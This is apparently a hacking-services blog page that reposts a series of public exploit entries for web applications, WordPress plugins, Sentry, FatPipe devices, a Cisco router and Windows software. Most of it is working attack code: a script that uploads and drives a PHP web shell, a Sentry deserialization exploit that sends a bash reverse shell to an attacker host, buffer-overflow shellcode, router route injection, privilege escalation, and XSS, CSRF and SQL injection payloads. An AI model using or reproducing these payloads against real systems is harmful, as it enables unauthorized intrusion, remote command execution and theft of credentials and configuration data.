Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138797

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.



# RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 ORS_v1.0.py
    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/


import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)





header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL

print(Style.BRIGHT+"               Online Reviewer System 1.0")
print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""
        ______ _______                         ________        
        ___  //_/__  /_______ ___      _______ ______(_)_____ _
        __  ,<  __  __ \  __ `/_ | /| / /  __ `/____  /_  __ `/
        _  /| | _  / / / /_/ /__ |/ |/ // /_/ /____  / / /_/ / 
        /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___  /  \__,_/  
                                               /___/           
                    abdullahkhawaja.com
            """)



GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}


#Create a new session
s = requests.Session() 


#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnarable Application : ")


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename
        getdir  = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell

phpshell  = {
               'personImage': 
                  (
                   'kh4waja.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/octet-stream', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'difficulty_id':'1', 'test_desc':'CIVIL ENGINEERING', 'test_desc':'CIVIL ENGINEERING', 'test_subject':'Mathematics, Surveying and Transportation Engineering', 'description':'Hello World', 'option_a':'a', 'option_b':'b', 'option_c':'c', 'option_d':'d',  'answer':'A', 'btnAddQuestion':'Save' }


filename = 'kh4waja.php'
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data)

shell_upload = True if("" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)



#Executing The Webshell
webshell(LINK, s)
HireHackking 
# Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 22/09/2021
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vulnerability Discovered By : Clement Berthaux (SYNACKTIV)
# Software Link: https://sentry.io/welcome/
# Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
# Tested on: Sentry 8.0.0
# Fixed Versions : 8.1.4 , 8.2.2 
# NOTE : Only exploitable by a user with Superuser privileges.
# Example Usage : https://imgur.com/a/4w5rH5s

import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
import argparse
import os
import time
from cPickle import dumps
import subprocess
from base64 import b64encode
from zlib import compress
from shlex import split
from datetime import datetime



parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE')
parser.add_argument('-U',help='Sentry Admin Username / Email')
parser.add_argument('-P',help='Sentry Admin Password')
parser.add_argument('-l',help='Rev Shell LHOST')
parser.add_argument('-p',help='Rev Shell LPORT ',type=int)
parser.add_argument('--url',help='Sentry Login URL ')
args = parser.parse_args()


username = args.U
password = args.P
lhost = args.l
lport = args.p
sentry_url = args.url



# Generate Payload


class PickleExploit(object):
	def __init__(self, command_line):
		self.args = split(command_line)
	def __reduce__(self):
		return (subprocess.Popen, (self.args,))
rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport)
payload = b64encode(compress(dumps(PickleExploit(rev_shell))))

print("\r\n[+] Using Bash Reverse Shell : %s" %(rev_shell))
print("[+] Encoded Payload : %s" %(payload))




# Perform Exploitation

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
request = requests.Session()
print("[+] Retrieving CSRF token to submit the login form")
print("[+] URL : %s" %(sentry_url))
time.sleep(1)
page = request.get(sentry_url)
html_content = page.text
soup = BeautifulSoup(html_content,features="lxml")
token = soup.findAll('input')[0].get("value")


print("[+] CSRF Token : "+token)
time.sleep(1)

#Login

proxies = {
	"http" : "http://127.0.0.1:8080",
	"https" : "https://127.0.0.1:8080",
}

login_info ={
            "csrfmiddlewaretoken": token,
            "op": "login",
            "username": username,
            "password": password
}


login_request = request.post(sentry_url,login_info)


if login_request.status_code==200:
	print("[+] Login Successful")
	time.sleep(1)

else:

	print("Login Failed")
	print(" ")
	sys.exit()


#get admin page
split_url = sentry_url.split("/")[2:]
main_url = "http://"+split_url[0]
audit_url = main_url+"/admin/sentry/auditlogentry/add/"

#request auditpage


date = datetime.today().strftime('%Y-%m-%d')
time = datetime.today().strftime('%H:%M:%S')


exploit_fields = {

		"csrfmiddlewaretoken" : request.cookies['csrf'],
		"organization" : "1",
		"actor_label" : "root@localhost",
		"actor" : "1",
		"actor_key" : " ",
		"target_object" : "2",
		"target_user" : " ",
		"event" : "31",
		"ip_address" : "127.0.0.1",
		"data" : payload,
		"datetime_0" : date,
		"datetime_1" : time,
		"initial-datetime_0" : date,
		"initial-datetime_1" : time,
		"_save" : "Save"
}

print("[+] W00t W00t Sending Shell :) !!!")
stager = request.post(audit_url,exploit_fields)

if stager.status_code==200:
	print("[+] Check nc listener!")
else:
	print("Something Went Wrong or Not Vulnerable :(")
HireHackking 
# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868


Proof of Concept:

1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.
HireHackking 
# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/fitness-calculators/
# Version: 1.9.5
# Tested on: Windows 10
# CVE: CVE-2021-24272

1. Description:
The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. 
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue

2. Proof of Concept:

<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
    <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
    <input type="submit" value="Save" name="submit">
</form>
HireHackking
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) # Date: 15/2/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/woo-order-export-lite/ # Version: 3.1.7 # Tested on: Windows 10 # CVE: CVE-2021-24169 1. Description: This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
HireHackking

Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/3dprint-lite/ # Date: 22/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/ # Version: <= 1.9.1.4 # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload") print("Author -> spacehen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [php file]") print("Ex: python3 exploit.py https://example.com ./shell.php") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("jsonrpc" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'p3dlite_handle_upload' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'file' : open(file_path)} print("Uploading Shell..."); response = requests.post(uri, files=files) file_name = path.basename(file_path) if(file_name in response.text): print("Shell Uploaded!") if(base[-1] != '/'): base += '/' print(base + "wp-content/uploads/p3d/" + file_name); else: print("Shell Upload Failed") sys.exit(1) main();
HireHackking

Budget and Expense Tracker System 1.0 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload # Exploit Author: ()t/\/\1 # Date: 23/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Tested on: Linux # Version: 2.0 # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. # PoC request POST /expense_budget/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/expense_budget/admin/?page=user X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712 Content-Length: 824 Connection: close Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="id" 1 -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="firstname" A -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="lastname" a -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="username" admin -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="password" -----------------------------1399170066243244238234165712 Content-Disposition: form-data; name="img"; filename="na3na3.php" Content-Type: image/jpeg <?php echo "<pre>";system($_GET['cmd']); ?> -----------------------------1399170066243244238234165712--
HireHackking

Police Crime Record Management Project 1.0 - Time Based SQLi

HACKER · %s · %s

# Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi # Exploit Author: ()t/\/\1 # Date: 23/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html # Tested on: Linux # Version: 1.0 # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data. # PoC request GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c Upgrade-Insecure-Requests: 1
HireHackking
# Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure # Google Dork: intext:"Powered by SmarterTrack" # Date: 23/01/2020 # Exploit Author: Andrei Manole # Vendor Homepage: https://www.smartertools.com/ # Software Link: https://www.smartertools.com/smartertrack # Version: TESTED ON 10.x -> 14.x and to Build 7922 (set 9, 2021) # Tested on: Windows 10 POC: VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx This file disclosure all agents id and first name and second name
HireHackking

Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers

HACKER · %s · %s

# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers # Date: 24/09/2021 # Exploit Author: Michael Alamoot # Vendor Homepage: https://www.cisco.com/ # Version: RV130W 1.0.3.44 # Tested on: Kali linux #! /usr/bin/env python3 from scapy.contrib.eigrp import EIGRPAuthData from scapy.contrib.eigrp import EIGRPIntRoute from scapy.contrib.eigrp import EIGRPGeneric from scapy.contrib.eigrp import EIGRPSeq from scapy.contrib.eigrp import EIGRP from scapy.layers.vrrp import VRRPv3 from scapy.layers.vrrp import VRRP from scapy.layers.l2 import Ether from scapy.layers.inet import IP from scapy.sendrecv import sendp from scapy.volatile import RandMAC from scapy.all import conf import socket,networkx,os import argparse,sys,asyncio class argX: def __init__(self): self.parser = argparse.ArgumentParser(description="...") self.parser.add_argument( "-i","--ip", help="ip router fake injection", dest="ip", ) self.parser.add_argument( "-r","--ip-router", help="ip router root", dest="router", default=conf.route.route('0.0.0.0')[2] ) def argvX(self): """ [0] ip-router [1] ip-fake """ args = self.parser.parse_args() ip = args.ip route = args.router return [ip,route] class exploit(object): def __new__(cls,*args,**kwargs): return super(exploit,cls).__new__(cls) def __init__(self,IProuter,InjectFackeRouter): self.IProuter = IProuter self.InjectFackeRouter = InjectFackeRouter self.MAC = RandMAC() def pyload(self): pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\ /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\ /IP(src=self.IProuter,dst="224.0.0.10") \ /EIGRP(opcode="Update",asn=100,seq=0,ack=0 ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)]) return pyload def start(self,count=[0,100]): for i in range(count[0],count[1]): sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0) print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m") if __name__ == "__main__": a = argX().argvX() if a[0]: net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0]) net1.start() else: print("[-h] [--help]")
HireHackking

Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)

HACKER · %s · %s

# Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH) # Date: 24.09.2021 # Software Link: https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2 # Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe # Exploit Author: Achilles # Tested Version: 1.3.8 # Tested on: Windows 7 64bit # 1.- Run python code : Ether_MP3_CD_Burner.py # 2.- Open EVIL.txt and copy All content to Clipboard # 3.- Open Ether_MP3_CD_Burner and press Register # 4.- Paste the Content of EVIL.txt into the 'Name and Code Field' # 5.- Click 'OK' # 6.- Nc.exe Local IP Port 3110 and you will have a bind shell # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 1008 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x10037859) #SkinMagic.dll nops = "\x90" * 20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 = -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python #badchars "\x00\x0a\x0d" shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20 "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8" "\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b" "\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07" "\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5" "\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f" "\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02" "\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59" "\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7" "\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb" "\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87" "\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01" "\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7" "\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45" "\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49" "\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1" "\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9" "\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c" "\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64" "\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38" "\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3" "\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0" "\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86" "\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e" "\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7" "\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4" "\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef" "\x77\x03\x31\x3a") payload = buffer + nseh + seh + nops + shellcode try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
HireHackking

XAMPP 7.4.3 - Local Privilege Escalation

HACKER · %s · %s

# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Original Author: Maximilian Barz (@S1lkys) # Date: 27/09/2021 # Vendor Homepage: https://www.apachefriends.org # Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4 # Tested on: Windows 10 + XAMPP 7.3.10 # References: https://github.com/S1lkys/CVE-2020-11107 $file = "C:\xampp\xampp-control.ini" $find = ((Get-Content $file)[2] -Split "=")[1] # Insert your payload path here $replace = "C:\temp\msf.exe" (Get-Content $file) -replace $find, $replace | Set-Content $file
HireHackking
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the backup archive file using an HTTP GET request. The only unknown part of the filename is the hostname of the system. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5683 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php 30.05.2016 25.07.2021 -- Products: --------- WARP / MPVPN / IPVPN Format: ------- https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz Examples: --------- curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN Version: -------- $ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2" 103: <h5>10.2.2r38</h5> Product: -------- $ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe" 15: <title>FatPipe MPVPN&nbsp;| Log in</title> Content: -------- $ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz $ cd etc $ cat Xpasswd Administrator:26df420bcb78bb02eef532d51aea22e2:1 fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1 $ ls . .. auto_config.conf bird.conf bridge.conf cm.conf crontab dhcpd.conf dnssec.conf dynamic_route.conf fatpipe fileserver.conf fp_arp.conf fp_config.dtd fp_distributed_global_rule fp_global_rule fp_version haproxy hosts interface_access_list.conf ipsec.conf ipsec.d ipsec.secrets ipsec_cert_secrets ipsec_shared_secrets ipsec_subnet.conf ipsec_xauth.conf ipv4_dynamic_routing.conf logrotate.d manifest named.conf network_object.conf ntp.conf ppp radiusclient resolv.conf rsyslog.conf site.xml site.xml.org snmp_config.conf squid sysconfig syslog.conf tcp-congestion-table.conf tcp-congestion-table.conf.org webfilter.conf xgreet.txt xnetmap.conf Xpasswd xsnmp.conf xtreme_conf.xml
HireHackking

FatPipe Networks WARP 10.2.2 - Authorization Bypass

HACKER · %s · %s

# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP 10.2.2 Authorization Bypass Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5682 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php 30.05.2016 25.07.2021 -- $ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"
HireHackking
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) # Date: 3/28/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/ # Version: 1.2.4 # Tested on: Windows 10 # CVE: CVE-2021-24274 1. Description: The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue 2. Proof of Concept: /wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
HireHackking
# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) # Date: 27/08/2021 # Exploit Author: Quadron Research Lab # Version: all version # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.redragonzone.com/pages/download # Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE import ctypes, sys from ctypes import * import io from itertools import product from sys import argv devicename = "REDRAGON_MOUSE" ioctl = 0x222414 kernel32 = windll.kernel32 hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print ("Not Win! Sorry!") else: print ("OPENED!") buf = '\x44' * 1000 + '\x00' * 1000 bufLength = 2000 kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
HireHackking
# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) # Exploit Author: V1n1v131r4 # Date: 2021-09-22 # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip # Version: 1.20.0 # Tested On: Kali Linux, Ubuntu 20.04 # Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers. # Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file. <html> <body> <form method="POST" action="http://example.com/backdrop/?q=admin/people/create"> <input type="text" name="q" value="admin/people/create"> <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8"> <input type="text" name="name" value="hacker"> <input type="text" name="mail" value="hacker@hacker.com"> <input type="text" name="notify" value="1"> <input type="text" name="pass" value="admin"> <input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY"> <input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I"> <input 